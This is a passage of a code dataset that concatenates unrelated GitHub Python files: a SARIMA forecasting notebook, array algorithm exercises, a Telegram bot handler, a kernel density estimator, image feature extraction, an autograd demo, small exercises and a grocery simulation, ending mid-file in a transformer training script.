of Bayesian Information Criterion (BIC): {}'.format(min(BIC)))\nprint('The maximum value of Log likehood: {}'.format(min(Lihood)))\nprint(Bold + 'Descending the Values of AIC and BIC:'+End)\nModSelect=pd.DataFrame({'Hyperparameters':para,'AIC':AIC,'BIC':BIC, 'Log likehood':Lihood}).sort_values(by=['AIC','BIC','Log likehood'],ascending=False)\nModSelect\n\n\n# # Fitting the optimal SARIMA model\n\n# In[46]:\n\n\nmod = sm.tsa.statespace.SARIMAX(closePrice, order=(2, 1, 1),enforce_stationarity=False,\n enforce_invertibility=False)\n\nresults = mod.fit()\n\nprint(Bold + 'The estimated ARIMA(2,1,1) Model'+ End)\n#print(results.summary().tables[1])\nprint(results.summary())\n\n\n# # Performing Model Diagnostics\n\n# We should always run model diagnostics to investigate any unusual behavior.\n\n# In[49]:\n\n\nresults.plot_diagnostics(figsize=(17,15))\nplt.show()\n\n\n# Our primary concern is to ensure that the residuals of our model are $\\textbf{uncorrelated}$ and $\\textbf{normally distributed with zero-mean}$. If the seasonal ARIMA model does not satisfy these properties, it should be further improved.\n# \n# In this case, our model diagnostics suggests that the model residuals are not normally distributed based on the following:\n# \n# 1. The residuals over time (top left plot) seem to display an obvious seasonality (downward trend) and moight not a obvious white noise process.\n# \n# \n# 2. In the top right plot, we see that the red KDE line is far from the N(0,1) line (where N(0,1)) is the standard notation for a normal distribution with mean 0 and standard deviation of 1). This is a good indication that the residuals are not normally distributed. \n# \n# 3. The qq-plot on the bottom left shows that the ordered distribution of residuals (blue dots) do not follow the linear trend of the samples taken from a standard normal distribution with N(0, 1). Again, this is a strong indication that the residuals are not normally distributed.\n# \n# see more $\\text{Q-Q Plot}$ at https://en.wikipedia.org/wiki/Q%E2%80%93Q_plot\n# \n# 4. The autocorrelation (i.e. correlogram) plot on the bottom right, which shows that the time series residuals have low correlation with lagged versions of itself, but several espisodes have high correlation with their own lagged values.\n# \n# Those observations lead us to conclude that our model produces a satisfactory fit that could help us understand our time series data and forecast future values.\n# \n# Although we have a satisfactory fit, some parameters of our seasonal ARIMA model could be changed to improve our model fit. For example, our grid search only considered a restricted set of parameter combinations, so we may find better models if we widened the grid search.\n# \n# It is not good enough since our model diagnostics suggests that the model residuals are not near normally distributed.\n","repo_name":"phuongvnguyen/Optimizing-the-SARIMA-algorithm","sub_path":"Optimize_SARIMA.py","file_name":"Optimize_SARIMA.py","file_ext":"py","file_size_in_byte":6993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"71308555638","text":"import math\n\n\ndef isValidSubsequence(array, sequence):\n # 0(n) time, 0(1) space, where n is length of array\n # Two pointers, let l = sequence, r = array\n l = r = 0\n\n while l < len(sequence) and r < len(array):\n if sequence[l] == array[r]:\n l += 1\n r += 1\n continue\n r += 1\n\n return l == len(sequence)\n\n\n\"\"\" Question 3 - sortedSquaredArray: Given an array that is sorted, square each nums and return it sorted. Note there might be negative numbers\n array = [-6,2,3,4,5] => [4,9,16,25,36]\n Method 1 - 0(nlogn) time, 0(1) space - Loop & sqaure the numbers, replace it by array[i] = n **2, sort resulting array\n Method 2 - 0(n) time, 0(n) space - Two pointers, Initialize the array with 0s, - Loop from end index\n if the absolute num at left-most index is greater than rightmost num, square the leftmost are insert, \n\"\"\"\n\n\ndef sortedSquaredArray(array):\n # 0(n) time, 0(n) space\n output = [0 for _ in range(len(array))]\n\n l, r = 0, len(array) - 1\n\n for i in reversed(range(len(array))):\n smallest = array[l]\n largest = array[r]\n\n if abs(smallest) > abs(largest):\n output[i] = smallest**2\n l += 1\n else:\n output[i] = largest**2\n r -= 1\n\n return output\n\n\n\"\"\" Question 4 - An algorithm challenge, Given an array of pairs team who competed, and array of the result in (0 & 1), If 1 = Home won, 0 = Away won. \n Return the overall best team. The one with the most wins, asumming each win is 3 points\n Method 1 - Use hashmap to save the bestTeam, \n e.g: competitions=[\n ['HTML', 'C#'], \n ['C#', 'Python'], \n ['Python', 'HTML']\n ] \n results=[0, 0, 1] --> \"Python\"\n\n\"\"\"\n\n\ndef tournamentWinner(competitions, results):\n # 0(n) time, 0(k) space - where n is number of competitions, k is number of teams\n # hash the winners points\n\n bestTeam = \"\"\n hashMap = {bestTeam: 0}\n\n for match, result in zip(competitions, results):\n result = 0 if result == 1 else 1 # swap the result index\n\n team = match[result]\n\n if team in hashMap:\n hashMap[team] += 3\n else:\n hashMap[team] = 3\n\n if hashMap[team] > hashMap[bestTeam]:\n bestTeam = team\n\n return bestTeam\n\n\n\"\"\" Question 5: Non-constructible chnage . \n Given an array of positive integers representing a the coins in your possession, write a function that returns the minimum sum of change\n that you CANNOT create. The array is not unique\n \n e.g [] --> 1\n [1,2,5] --> 4\n [5, 7, 1, 1, 2, 3, 22] --> 20\n Method: 0(nlogn) time | 0(1) space\n - The minimum amount you cannot create is usually the next unavailable number after the sum of all least numbers before it \n i.e if all numbers sums up, we're unable to derive that number\n\"\"\"\n\n\ndef nonConstructibleChange(coins):\n coins.sort()\n\n currentChangeCreated = 0\n for coin in coins:\n # i.e all the previous sums didnt create this number and now we're currently at a number greater than it\n if coin > currentChangeCreated + 1:\n return currentChangeCreated + 1\n currentChangeCreated += coin\n\n return currentChangeCreated + 1\n\n\nprint(nonConstructibleChange([1, 2, 4, 7]))\n\n\"\"\" Question 6 - 3sums. Given an unsorted array and a target, return all the triplets nums that sums upto target in a sorted order\n [12,3,1,2,-6,5,-8,6], target = 0 => Solution=> [[-8,2,6], [-8,3,5], [-6, 1,5]] \n Method 1: Like 2sums, you can use hashMap or cubic time 0(n^3), 3 loops. \n Method 2: Loop through, for every index, while loop two pointers at the next index from current index, (sum current index, and left and end pointer)\n Keep moving the pointers until target sum is found, else break out from the loop and move over to the next index\n 0(n^2)time, 0(n)space \n Method 3: Use the combinations method from itertools\n\"\"\"\n\n\ndef threeNumberSum(array, targetSum):\n # 0(n^2)time, 0(n)space\n result = []\n\n array.sort()\n\n for i in range(len(array) - 1):\n left = i + 1\n right = len(array) - 1\n while left < right:\n calcd = array[i] + array[left] + array[right] # <== FORMULAR POINT\n if calcd == targetSum:\n result.append([array[i], array[left], array[right]])\n\n left += 1\n right -= 1\n\n if calcd > targetSum:\n right -= 1\n if calcd < targetSum:\n left += 1\n\n return result\n\n\n\"\"\" Question 7 - Smallest Difference\n Given 2 arrays, returns the two numbers from each array whose absolute difference is closest to 0\n NOTE: The absolute difference of 2 integers is the distance between them on a real number line\n Consider Line number scale, diff = -5 and 5 = 10. diff = -5 and -4 = -1\n arr1 = [-1,5,10,20,28,3]\n arr2 = [26,134,135,15,17] solution => [28,26]\n Method 1 - 0(n * m) time, 0(1)space - Quadratic looping through arr1 and arr2, if the difference is lower than the last recorded difference,\n overrite it. Also overrite with both pair\n Method 2 - 0(nlongn + mlogm) time, 0(1) space - Sort the array. Two pointers. Until the left and right are within bounds. Continue to find the \n difference between both sides nums, if 0, return pair, otherwise record it if is lower than the previous.\n \n we're shifting pointers because we are trying to obtain the closest difference to 0 \n\"\"\"\n\n\ndef smallestDifference(arrayOne, arrayTwo):\n # Method 1\n # 0(n * m) time, 0(1) space\n\n value = float(\"inf\")\n result = []\n\n for i in range(len(arrayOne)):\n for j in range(len(arrayTwo)):\n substract = (arrayOne[i]) - (arrayTwo[j])\n abst = abs(substract)\n\n if abst < value:\n value = abst\n result = [arrayOne[i], arrayTwo[j]]\n\n return result\n\n # Method 2.\n # 0(nlongn + mlogm) time, 0(1) space\n\n arrayOne.sort()\n arrayTwo.sort()\n\n left = right = 0\n smallest = float(\"inf\")\n smallestPair = []\n\n while left < len(arrayOne) and right < len(arrayTwo):\n firstNum = arrayOne[left]\n secondNum = arrayTwo[right]\n\n if firstNum < secondNum:\n current = secondNum - firstNum\n left += 1\n elif secondNum < firstNum:\n current = firstNum - secondNum\n right += 1\n else:\n return [firstNum, secondNum] # if diff is 0.\n\n if current < smallest:\n smallest = current\n smallestPair = [firstNum, secondNum]\n\n return smallestPair\n\n\n\"\"\" Question 8 - Move element to end \n Given an array, Move all occurrences of a target element to the end. The order of the elements doesn't matter.\n [2,1,3,2,4,2,1,2], toMove = 2. Solution => [1,3,4,1,2,2,2,2]\n Method 1 - Two pointers, On the left side keep looping until the target is found, on the right side keep looping until a non-target is\n found, swap them. \n\"\"\"\n\n\ndef moveElementToEnd(array, toMove):\n # This maintains the order\n elementIdx = 0\n for idx in range(len(array)):\n if array[idx] != toMove:\n swap(idx, elementIdx, array)\n elementIdx += 1\n\n return array\n\n\ndef swap(i, j, array):\n array[i], array[j] = array[j], array[i]\n\n\ndef moveElementToEnd(array, toMove):\n # 0(n) time, 0(1) space\n left, right = 0, len(array) - 1\n while left <= right:\n # if not target, please move to next, same idea to skip duplicated number in a rotated array with duplicates.\n while left < right and array[left] != toMove:\n left += 1\n while left < right and array[right] == toMove:\n right -= 1\n\n array[left], array[right] = array[right], array[left]\n\n left += 1\n right -= 1\n\n return array\n\n\n\"\"\" Question 9 - Monotonic Array\n Given an array, Determine if it is Monotonic. \n A monotomic array is that which continuously increasing or contineously decreasing. \n Although similar adjacents elements is still regarded as being monotomic\n Method 1 - 0(n) time, 0(1) space.\n First Determine if the array is increasing or decreasing by the first 2 different elements. Use a flag\n\"\"\"\n\n\ndef isMonotonic(array):\n # - take care of empty or single element array, they're monotonic\n # - Determine if elements are increasing or non-decreasing with a flag\n # - if increasing, the next element is lower than the current element return false\n\n if len(array) <= 2:\n return True\n\n is_increase = False\n\n l, r = 0, 1\n while r < len(array):\n if array[l] < array[r]:\n is_increase = True\n break\n l += 1\n r += 1\n\n for i in range(len(array) - 1):\n if is_increase and array[i] > array[i + 1]:\n return False\n\n return True\n\n\n\"\"\" Question 9 - Spiral Matrix Traverse\n Given a 2D array, Collect all numbers into an array. \n \n Method 1 - 0(n) time, 0(n) space.\n \n\"\"\"\n\n\ndef spiralTraverse(array):\n \"\"\"\n [\n sC eC\n sR [1, 2, 3, 4]\n [12,13,14,5]\n [11,16,15,6]\n eR [10, 9, 8,7]\n ]\n\n result => [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16]\n \"\"\"\n result = []\n startRow, endRow = 0, len(array) - 1\n startCol, endCol = 0, len(array[0]) - 1\n\n while startRow <= endRow and startCol <= endCol:\n # top\n for col in range(startCol, endCol + 1):\n result.append(array[startRow][col])\n\n # right\n for row in range(startRow + 1, endRow + 1):\n result.append(array[row][endCol])\n\n # bottom\n for col in reversed(range(startCol, endCol)):\n # Make sure bottom != top -- CHECK ROW CONSTRAINT, IF YOU\"RE COLLECTING COLUMN,\n if startRow == endRow:\n break\n result.append(array[endRow][col])\n\n # left\n for row in reversed(range(startRow + 1, endRow)):\n # Make sure left != right\n if startCol == endCol:\n break\n result.append(array[row][startCol])\n\n startRow += 1\n startCol += 1\n endRow -= 1\n endCol -= 1\n\n return result\n\n\n\"\"\" Question 9 - Longest Peak\n Write a function that takes in an array of integers and return the length of the longest peak in the array\n \n A peak is where the adjacents element is strictly increasing\n until they reach a tip(usually highest value in the peak), at which point they become strictly decreasing\n \n [1,4,10,2] is a peak\n [4,0,10] not a peak\n [1,2,2,0] not a peak\n [1,2,3] not a peak because there is any strictly decreasing after 3\n \n e.g : array=[1, 2, 3, 3, 4, 0, 10, 6, 5, -1, -3, 2, 3] --> 6 // 0, 10, 6, 5, -1, -3\n The tip of a peak, is at the point where it was increasing and then decreases.\n l p r\n [1,2,3,3,4,0, 10, 6,5,-1,-3,2,3] -> 0,10,6,5,-1,-3, maxPeak= 6,\n there is a peak happening at 10\n Method 1 - 0(n) time, 0(1) space.\n - start from the second element\n\"\"\"\n\n\ndef longestPeak(array):\n maxPeak = 0\n i = 1\n end = len(array) - 1 # we need i to stop before the last\n\n while i < end:\n isPeak = array[i - 1] < array[i] and array[i] > array[i + 1]\n # previous & current is not a start of a peak. Go FORWARD\n if not isPeak:\n i += 1\n continue\n\n # if previous and current is a peak, start expanding until the peak condition is broken or outofbounds\n left = i - 2\n while left >= 0 and array[left] < array[left + 1]:\n left -= 1\n\n right = i + 2\n while right < len(array) and array[right] < array[right - 1]:\n right += 1\n\n peakLength = right - left - 1 # -1 because left expanded beyond what we want\n\n maxPeak = max(maxPeak, peakLength)\n\n # continue from where right stopped\n i = right\n return maxPeak\n\n\n\"\"\"Question 12- Array of products \n A function that returns an array of the same length, where each element in the output array\n is equal to the product of every other number in the input array\n [5,1,4,2] => [8, 40, 10, 20]\n\"\"\"\n\n\ndef arrayOfProducts(array):\n output = []\n for i in range(len(array)):\n output.append(math.prod(array[0:i] + array[i + 1 :]))\n return output\n\n\n\"\"\"Question 13 - First duplicate value \n Given an array of integers between 1 and n, where n is the length of the array, return the number\n that is duplicated first.\n [2,1,5,2,3,3,4], 2 appeared first\n Method 1 - 0(n^2) time 0(1) space\n Method 2 - 0(n) time 0(n) space, Using hashSet or hashMap\n Method 3 - 0(n) time, 0(1) space \n - By substracting each number from 1, it represent an index in the array,\n - Whatever number you find in the index, flag it as negative \n - The next time you encounter a number at an index that's already negative, you know you've already seen the number that produces that index\n\"\"\"\n\n\ndef firstDuplicateValue(array):\n # we're substracting 1 because we're dealing with' index and the questions says from 1-n\n for n in array:\n # get index\n absN = abs(n)\n if array[absN - 1] < 0:\n return absN\n array[absN - 1] *= -1\n\n return -1\n\n\n\"\"\" Question 14 - Merge-overlapping intervals \n\n e.g: [[1,2], [3,5], [4,7], [6,8], [9,10]] -> [[1,2], [3,8], [9,10]] \n [[1,4], [6,9], [5, 10]] --> [1,10]\n Method : 0(nlogn) time and 0(n) space\n - Compare the incoming interval to the last saved interval. \n - If the start of the incoming is less than/equal to the end of the last saved, overrite the last saved with the maximum ends of incoming and last saved. \n\"\"\"\n\n\ndef mergeOverlappingIntervals(intervals):\n intervals.sort(key=lambda x: x[0])\n output = []\n idx = 0\n\n while idx < len(intervals):\n if not output:\n output.append(intervals[idx])\n else:\n # if the start of the current interval is less than or equal to the end of the last saved\n if intervals[idx][0] <= output[-1][1]:\n output[-1][1] = max(intervals[idx][1], output[-1][1])\n else:\n output.append(intervals[idx])\n\n idx += 1\n\n return output\n\n\n\"\"\" Question 15 - Zero sum subarray\n Given an array of intergers, write a func that returns a boolean if there is a subarray whos \n sum is equal to zero (0)\n\n e.g: [-5,-5, 2, 3, -2] --> True // [-5, 2, 3]\n \n Method 1 - 0(n^2) time | 0(n^2) space\n\n Method 2 - 0(n) time | 0(n) space \n sums = set([0, -5, -10, -8, -5, ....])\n [-5,-5, 2, 3, -2] \n currentSum = [-5,-10, -8, -5, ...] \n We found -5 again, which is already in the set. This means there must be a subarray which sums up to zero\n An index after our first -5 and the current -5 index is the subarray \n\"\"\"\n\n\ndef zeroSumSubarray(nums):\n if 0 in nums:\n return True\n\n for i in range(len(nums) - 1):\n for j in range(i + 1, len(nums)):\n subArray = nums[i : j + 1]\n if sum(subArray) == 0:\n return True\n\n return False\n\n\ndef zeroSumSubarray(nums):\n sums = set([0])\n currentSum = 0\n for num in nums:\n currentSum += num\n if currentSum in sums:\n return True\n sums.add(currentSum)\n return False\n\n\n\"\"\" Question : 3 Sum\n Return all combination of numbers from the array that equals to targetSum\n\n Method : 0(n^2)time, 0(n)space \n \n\"\"\"\n\n\ndef threeNumberSum(array, targetSum):\n result = []\n\n array.sort()\n\n for i in range(len(array) - 1):\n left = i + 1\n right = len(array) - 1\n while left < right:\n calcd = array[i] + array[left] + array[right]\n if calcd == targetSum:\n result.append([array[i], array[left], array[right]])\n\n left += 1\n right -= 1\n\n if calcd > targetSum:\n right -= 1\n if calcd < targetSum:\n left += 1\n\n return result\n\n\n\"\"\" Question 15 - 4sum\n\n Method : 0(n^3) time, 0(n^2) space\n - Like 3 sum, a double for-loop before searching with pointers.\n\"\"\"\n\n\ndef fourNumberSum(array, targetSum):\n output = []\n array.sort()\n\n for i in range(len(array) - 3):\n for j in range(i + 1, len(array) - 2):\n l, r = j + 1, len(array) - 1\n\n while l < r:\n curr = [array[i], array[j], array[l], array[r]]\n currSum = sum(curr)\n if currSum == targetSum:\n if curr not in output:\n output.append(curr)\n l += 1\n r -= 1\n elif currSum > targetSum:\n r -= 1\n elif currSum < targetSum:\n l += 1\n return output\n\n\n\"\"\" Question 16 - Subarray sort\n Given an array, return the start and end indexes of the smallest subarray from the input that need to be sorted to\n make the entire array sorted. If the entire is already sorted, return [-1, -1]\n e.g : [0,1,2,5,4,7,3,6,8,9],--> [3, 7]\n The subarray =[5,4,7,3,6] need to be sorted to make the entire array sorted\n \n Method 1: 0(n) time | 0(1) space\n Note: if one number is found unsorted, that means two is unsorted, \n The subarray is dependent on the values that are out of order.\n (where the min and max values are suppose to be)\n - The idea is to find the minimum and maximum value that are out of order.\n - Find the position index of where both the minimum value and maximum value are\n suppose to be\n\"\"\"\n\n\ndef subarraySort(array):\n minOutOfOrder = float(\"inf\")\n maxOutOfOrder = float(\"-inf\")\n\n for i in range(len(array)):\n num = array[i]\n # A number is out of order if the prev is greater than it or it is greater than the previous\n if isOutOfOrder(i, num, array):\n minOutOfOrder = min(minOutOfOrder, num)\n maxOutOfOrder = max(maxOutOfOrder, num)\n\n # check if any outofOrder was found\n if minOutOfOrder == float(\"inf\"):\n return [-1, -1]\n\n # Now, find the position index\n # where the minumum and maximum out of order is suppose to be\n subarrayMinIdx = 0\n while minOutOfOrder >= array[subarrayMinIdx]:\n subarrayMinIdx += 1\n\n subarrayMaxIdx = len(array) - 1\n while maxOutOfOrder <= array[subarrayMaxIdx]:\n subarrayMaxIdx -= 1\n\n return [subarrayMinIdx, subarrayMaxIdx]\n\n\ndef isOutOfOrder(i, num, array):\n if i == 0:\n return num > array[i + 1]\n if i == len(array) - 1:\n return num < array[i - 1]\n return array[i - 1] > num or num > array[i + 1]\n\n\"\"\" Question 17 - Transpose Matrix\n Given a 2D array of intergers matrix. Write a func that returns the transpose of the matrix. \n NOTE: Transpose of a matrix, the rows becoming columns and vice versa. \n\n e.g : [\n [1, 2],\n [3, 4],\n [5, 6],]\n -->\n [\n [1, 3, 5],\n [2, 4, 6],\n ]\n \n Method : 0(n * h) time | 0(n * h) space\n We need to go inside the column for every row and \n add to a new array which will later be added to our result\n\"\"\"\n\ndef transposeMatrix(matrix):\n\n result = []\n for col in range(len(matrix[0])):\n newRow = []\n for row in range(len(matrix)):\n newRow.append(matrix[row][col])\n\n result.append(newRow)\n return result \n\n\"\"\" Question 18 - Best Seat\n You walk into a movie theater and you'll like to seat in a row that gives you the most space, you'll prefer this\n space to be evenly distributed on both sides (e.g if there are 3 empty seats, you'll like to seat in the second seat)\n\n Given an array representing the theater row, return the seat index of where you should seat. \n NOTE: 1's represents occupied seats, 0's represents empty seats\n\n Assume that someone is always seating into the first & last seat, and whenever there are two equally good seat, \n you should seat in the smallest index \n\n if there is no seat, return -1 \n\n e.g: array=[1, 0, 1, 0, 0, 0, 1] --> 4 \n seats=[1, 0, 0, 1] --> 1 \n seats=[1, 0, 0, 1, 0, 0, 1] --> 1\n seats=[1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1] --> 3\n \n Method 1: \n Identify the longest contineous subarray of zeros\n - find the longest 0's subarray \n - Save the start and end indexes of the longest 0's subarray\n - return the average. i.e the middle of both indexes\n\"\"\"\n\n\ndef bestSeat(seats):\n if 0 not in seats:\n return -1\n\n longest = float(\"-inf\")\n indexes = []\n startIdx = 1\n\n while startIdx < len(seats):\n # Found start index\n if seats[startIdx] == 0:\n endIdx = startIdx\n # Find the end index of contineous 0's\n while endIdx < len(seats) and seats[endIdx] == 0:\n endIdx += 1\n length = endIdx - startIdx\n if length > longest:\n indexes = [startIdx, endIdx - 1]\n longest = endIdx - startIdx\n\n startIdx += 1\n\n return sum(indexes) // 2\n","repo_name":"ihonomic/python_workspace","sub_path":"_DSA/AlgoXpert/Arrays.py","file_name":"Arrays.py","file_ext":"py","file_size_in_byte":21229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"1404328859","text":"from aiogram import Dispatcher\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.types import Message, ParseMode\nfrom asyncpg import Record\n\nfrom app.config import HELLO_MESSAGE, ADMIN_HELLO_MESSAGE\nfrom app.logger import logger\nfrom app.users import crud as users_crud\nfrom .keyboards import main_admin_keyboard, main_keyboard\n\n\nasync def start(message: Message, state: FSMContext):\n if state.get_state():\n await state.finish()\n\n from_user = message.from_user\n username = from_user.username\n logger.debug(f'{username} started bot')\n\n user: Record = await users_crud.get_user_by_id(user_id=from_user.id)\n\n msg = HELLO_MESSAGE\n reply_markup = main_keyboard\n\n if user:\n logger.debug(f'user: {username} found in db, '\n f'is_admin={user[\"is_admin\"]}')\n if user['is_admin']:\n msg += ADMIN_HELLO_MESSAGE\n reply_markup = main_admin_keyboard\n\n else:\n logger.debug(f'user: {username} not found in db')\n await users_crud.insert_user(user_id=from_user.id,\n username=from_user.username)\n await message.answer(text=msg,\n reply_markup=reply_markup,\n parse_mode=ParseMode.MARKDOWN)\n\n\ndef register_handlers(dp: Dispatcher):\n dp.register_message_handler(start, commands=[\"start\", 'help'], state='*')\n","repo_name":"Pampam000/TestTaskChatLabs","sub_path":"app/bot/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"40689723705","text":"#!/usr/bin/env python\nimport numpy\nimport scipy.special\nimport statistics\nimport kde.evaluate as evaluate\n\nclass KDE(object):\n kernels = ['bump', 'cosine', 'epanechnikov', 'gaussian', 'logistic',\n 'quartic', 'tophat', 'triangle', 'tricube']\n\n metrics = ['euclidean_distance', 'euclidean_distance_ntorus']\n\n def __init__(self, training_points, kernel='gaussian', weights=None, \n metric='euclidean_distance', bw=1):\n\n self.set_training_points(training_points)\n self.set_kernel_type(kernel)\n self.set_metric(metric)\n self.bw = bw\n\n # Normalize the weights, making a copy of the array if necessary\n if weights is not None:\n self.weights = numpy.require(weights, dtype=numpy.float64)\n s = self.weights.sum()\n if s != 1:\n self.weights = numpy.copy(weights)/s \n else:\n self.weights = None\n\n def set_training_points(self, training_points):\n self.training_points = numpy.require(training_points, dtype=numpy.float64)\n\n # Make training points two dimensional.\n if self.training_points.ndim > 2 or self.training_points.ndim == 0:\n raise ValueError(\"Training points can only be 1 or 2 dimensional.\")\n elif self.training_points.ndim == 1:\n self.training_points = self.training_points[:, numpy.newaxis]\n elif self.training_points.ndim == 2:\n pass\n\n def set_metric(self, metric):\n if not metric in self.metrics:\n raise ValueError(\"Invalid metric {:s}. Valid metrics include: \\n{:s}\"\\\n .format(repr(self.metrics)))\n self.metric = metric\n\n def set_kernel_type(self, kernel):\n if not kernel in self.kernels:\n raise ValueError(\"Invalid kernel {:s}. Valid kernels include: \\n{:s}\"\\\n .format(kernel, repr(self.kernels)))\n self.kernel = kernel\n\n def evaluate(self, points, cuda=False):\n '''\n Evaluate the kernel density estimate at each point in ``points``\n '''\n # Make sure points is the correct shape\n points = numpy.require(points, dtype=numpy.float64)\n if points.ndim > 2 or points.ndim == 0:\n raise ValueError(\"Dimension of ``points`` must be the same as the \"\n \"training_points.\")\n elif points.ndim == 1:\n points_ = points[:,numpy.newaxis]\n elif points.ndim == 2:\n points_ = points \n\n if points_.shape[1] != self.training_points.shape[1]:\n raise ValueError(\"``points`` has {:d} features while \"\n \"``training_points`` has {:d} features. Number of features \"\n \"must be the same.\".format(points_.shape[1],\n self.training_points.shape[1]))\n\n if cuda:\n import kde.cuda.evaluate as cuda_evaluate\n result = cuda_evaluate.estimate_pdf_brute(points_, self.training_points,\n bandwidth=self.bw, \n weights=self.weights,\n metric=self.metric,\n kernel=self.kernel)\n else:\n result = evaluate.estimate_pdf_brute(points_, self.training_points,\n bandwidth=self.bw, \n weights=self.weights,\n metric=self.metric,\n kernel=self.kernel)\n\n # Return array of same shape as input ``points``\n return result.reshape(points.shape[0])\n","repo_name":"ajd98/kde","sub_path":"kde/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"4"} +{"seq_id":"3666083640","text":"__author__ = 'Guanhua, Joms'\nimport os\nfrom real_single_pic import *\nfrom scipy.io import savemat\nimport pickle\nfrom numpy import array\n\n\ndef pic_package_to_mat(input_fldr, file_heading, number_of_file):\n feature = []\n num_super_pixel = []\n dim = []\n for n in range(number_of_file):\n png_file_name = \"%s_%06d.png\" % (file_heading, n)\n path_png = os.path.join(input_fldr, png_file_name)\n dat_file_name = \"%s_%06d.dat\" % (file_heading, n)\n pkl_file_name = \"%s_%06d.pkl\" % (file_heading, n)\n path_dat = os.path.join(input_fldr, dat_file_name)\n path_pkl = os.path.join(input_fldr, pkl_file_name)\n pic_feature, label_dict, pic_dim = single_pic_feature_computation_without_target(path_png, path_dat)\n num_super_pixel.append(shape(pic_feature)[0])\n feature.append(pic_feature)\n dim.append(pic_dim)\n with open(path_pkl, 'wb') as output:\n pickle.dump(label_dict, output, pickle.HIGHEST_PROTOCOL)\n feature = array(feature)\n dim = array(dim)\n\n # save to mat\n feature_explanation = [\"r\", \"g\", \"b\", \"nr\", \"ng\", \"o1\", \"o2\", \"h\", \"s\", \"v\", \"l\", \"a\", \"b\"]\n params_dict = {'feature_vector': feature, 'feature_explanation': feature_explanation, 'feature_dim': [13],\n 'total_pic': [number_of_file], 'num_of_super_pixel': num_super_pixel, 'dim': dim}\n save_path = os.path.join(input_fldr, \"%s_data\" % file_heading)\n savemat(save_path, params_dict)\n\npic_package_to_mat('c:/data_road/testing/uu/', 'uu', 100) # about 25 min to process\npic_package_to_mat('c:/data_road/testing/um/', 'um', 96)\npic_package_to_mat('c:/data_road/testing/umm/', 'umm', 94)\n","repo_name":"archonren/project","sub_path":"preprocess/pic_package_feature_mat_without_target.py","file_name":"pic_package_feature_mat_without_target.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"4683920461","text":"'''\nCreated on Aug 9, 2018\n\n@author: xiongan2\n'''\n#Wrapper Around Numpy\nimport autograd.numpy as np\nimport autograd.numpy.random as npr\nfrom autograd.test_util import check_grads\nfrom autograd import grad\n#Define the function\ndef f(x1, x2):\n return np.sqrt(x1 * x1 + x2 * x2)\n\ndef logsumexp(x):\n max_x = np.max(x)\n return max_x + np.log(np.sum(np.exp(x - max_x)))\n\ndef example_func(y):\n z = y**2\n lse = logsumexp(z)\n return np.sum(lse)\n\n#Computes and checks the gradient for the given values\ncheck_grads(f)(1.0, 2.0)\n\ngrad_of_example = grad(example_func)\nprint(\"Gradient: \\n\", grad_of_example(npr.randn(10)))\n\n# Check the gradients numerically, just to be safe.\ncheck_grads(example_func, modes=['rev'])(npr.randn(10))","repo_name":"motein/Pocketin","sub_path":"MachineLearning/DeepLearning/DeepLearningWithPython/chapter9/demo9_2.py","file_name":"demo9_2.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"31656181844","text":"# Desarrollar un programa que utilice una función que reciba como parámetro una cadena de caracteres conteniendo una dirección de correo electrónico y devuelva una tupla con las distintas partes que componen dicha dirección. Ejemplo: alguien@uade.edu.ar -> (alguien, uade, edu, ar)\n\ndef descomponer_direccion_correo(correo):\n partes = correo.split('@')\n usuario = partes[0]\n dominio = partes[1]\n dominio_partes = dominio.split('.')\n extension = dominio_partes[-1]\n dominio_sin_extension = '.'.join(dominio_partes[:-1])\n return (usuario, dominio_sin_extension, extension)\n\ndireccion_correo = 'alguien@uade.edu.ar'\npartes_direccion = descomponer_direccion_correo(direccion_correo)\nprint(partes_direccion)\n","repo_name":"TobaMedina/Exercises","sub_path":"Exercises.py/Class exercises/Tuples, Dictionaries & Sets - exercises/TP08-02.py","file_name":"TP08-02.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"40373777914","text":"from .checkout_line import CheckoutLine\n\nclass GroceryStore:\n \"\"\"A grocery store.\n\n A grocery store contains different types of checkout lines.\n\n === Attributes ===\n @type lines: list[CheckoutLine]\n A list of checkout lines.\n @type last_line_id: int\n The last line picked by a customer to checkout.\n Particularly useful for round-robin assignment scheme.\n @type total_lines: int\n The number of checkout lines in total.\n \"\"\"\n \n def __init__(self, line_counts):\n \"\"\"Initialize a GroceryStore given number of each type of line.\n\n @type line_counts: dict[str, int]\n A mapping from each checkout line type to how many there are.\n Contains the follwing keys:\n \"cashier_count\", \"express_count\", \"self_count\"\n @rtype: None\n \"\"\"\n self.lines = []\n line_id = 0\n for line_type, line_count in sorted(line_counts.items()):\n for _ in range(line_count):\n self.lines.append(CheckoutLine(line_id, line_type))\n line_id += 1\n self.last_line_id = line_id - 1\n self.total_lines = line_id\n","repo_name":"Jasonqi146/Supermarket_CheckOut_Simulator","sub_path":"simulation/grocery_store.py","file_name":"grocery_store.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"39237139779","text":"from __future__ import absolute_import\n\nimport os\nimport logging\nimport argparse\nimport json\nimport math\nimport numpy as np\nfrom io import open\nfrom tqdm import tqdm\nimport torch\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch.utils.data import Dataset, DataLoader, SequentialSampler, RandomSampler\nfrom torch.utils.data.distributed import DistributedSampler\nfrom transformers import (get_linear_schedule_with_warmup,\n RobertaConfig, RobertaModel, RobertaTokenizer,\n GPT2Config, GPT2Model, GPT2Tokenizer,\n BartConfig, BartForConditionalGeneration, BartTokenizer,\n 